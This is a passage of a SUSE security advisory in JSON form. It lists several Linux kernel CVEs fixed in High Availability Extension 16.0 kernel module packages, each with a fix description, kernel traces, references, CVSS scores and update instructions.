"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2024-54031"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npm: cpupower: bench: Prevent NULL dereference on malloc failure\n\nIf malloc returns NULL due to low memory, \u0027config\u0027 pointer can be NULL.\nAdd a check to prevent NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37841",
"url": "https://www.suse.com/security/cve/CVE-2025-37841"
},
{
"category": "external",
"summary": "SUSE Bug 1242974 for CVE-2025-37841",
"url": "https://bugzilla.suse.com/1242974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-37841"
},
{
"cve": "CVE-2025-37845",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37845"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: fprobe events: Fix possible UAF on modules\n\nCommit ac91052f0ae5 (\"tracing: tprobe-events: Fix leakage of module\nrefcount\") moved try_module_get() from __find_tracepoint_module_cb()\nto find_tracepoint() caller, but that introduced a possible UAF\nbecause the module can be unloaded before try_module_get(). In this\ncase, the module object should be freed too. Thus, try_module_get()\ndoes not only fail but may access to the freed object.\n\nTo avoid that, try_module_get() in __find_tracepoint_module_cb()\nagain.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37845",
"url": "https://www.suse.com/security/cve/CVE-2025-37845"
},
{
"category": "external",
"summary": "SUSE Bug 1242986 for CVE-2025-37845",
"url": "https://bugzilla.suse.com/1242986"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-37845"
},
{
"cve": "CVE-2025-37904",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37904"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix the inode leak in btrfs_iget()\n\n[BUG]\nThere is a bug report that a syzbot reproducer can lead to the following\nbusy inode at unmount time:\n\n BTRFS info (device loop1): last unmount of filesystem 1680000e-3c1e-4c46-84b6-56bd3909af50\n VFS: Busy inodes after unmount of loop1 (btrfs)\n ------------[ cut here ]------------\n kernel BUG at fs/super.c:650!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 0 UID: 0 PID: 48168 Comm: syz-executor Not tainted 6.15.0-rc2-00471-g119009db2674 #2 PREEMPT(full)\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n RIP: 0010:generic_shutdown_super+0x2e9/0x390 fs/super.c:650\n Call Trace:\n \u003cTASK\u003e\n kill_anon_super+0x3a/0x60 fs/super.c:1237\n btrfs_kill_super+0x3b/0x50 fs/btrfs/super.c:2099\n deactivate_locked_super+0xbe/0x1a0 fs/super.c:473\n deactivate_super fs/super.c:506 [inline]\n deactivate_super+0xe2/0x100 fs/super.c:502\n cleanup_mnt+0x21f/0x440 fs/namespace.c:1435\n task_work_run+0x14d/0x240 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:114 [inline]\n exit_to_user_mode_prepare include/linux/entry-common.h:329 [inline]\n __syscall_exit_to_user_mode_work kernel/entry/common.c:207 [inline]\n syscall_exit_to_user_mode+0x269/0x290 kernel/entry/common.c:218\n do_syscall_64+0xd4/0x250 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n \u003c/TASK\u003e\n\n[CAUSE]\nWhen btrfs_alloc_path() failed, btrfs_iget() directly returned without\nreleasing the inode already allocated by btrfs_iget_locked().\n\nThis results the above busy inode and trigger the kernel BUG.\n\n[FIX]\nFix it by calling iget_failed() if btrfs_alloc_path() failed.\n\nIf we hit error inside btrfs_read_locked_inode(), it will properly call\niget_failed(), so nothing to worry about.\n\nAlthough the iget_failed() cleanup inside btrfs_read_locked_inode() is a\nbreak of the normal error handling scheme, let\u0027s fix the obvious bug\nand backport first, then rework the error handling later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37904",
"url": "https://www.suse.com/security/cve/CVE-2025-37904"
},
{
"category": "external",
"summary": "SUSE Bug 1243452 for CVE-2025-37904",
"url": "https://bugzilla.suse.com/1243452"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-37904"
},
{
"cve": "CVE-2025-37955",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37955"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: free xsk_buffs on error in virtnet_xsk_pool_enable()\n\nThe selftests added to our CI by Bui Quang Minh recently reveals\nthat there is a mem leak on the error path of virtnet_xsk_pool_enable():\n\nunreferenced object 0xffff88800a68a000 (size 2048):\n comm \"xdp_helper\", pid 318, jiffies 4294692778\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 0):\n __kvmalloc_node_noprof+0x402/0x570\n virtnet_xsk_pool_enable+0x293/0x6a0 (drivers/net/virtio_net.c:5882)\n xp_assign_dev+0x369/0x670 (net/xdp/xsk_buff_pool.c:226)\n xsk_bind+0x6a5/0x1ae0\n __sys_bind+0x15e/0x230\n __x64_sys_bind+0x72/0xb0\n do_syscall_64+0xc1/0x1d0\n entry_SYSCALL_64_after_hwframe+0x77/0x7f",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37955",
"url": "https://www.suse.com/security/cve/CVE-2025-37955"
},
{
"category": "external",
"summary": "SUSE Bug 1243507 for CVE-2025-37955",
"url": "https://bugzilla.suse.com/1243507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
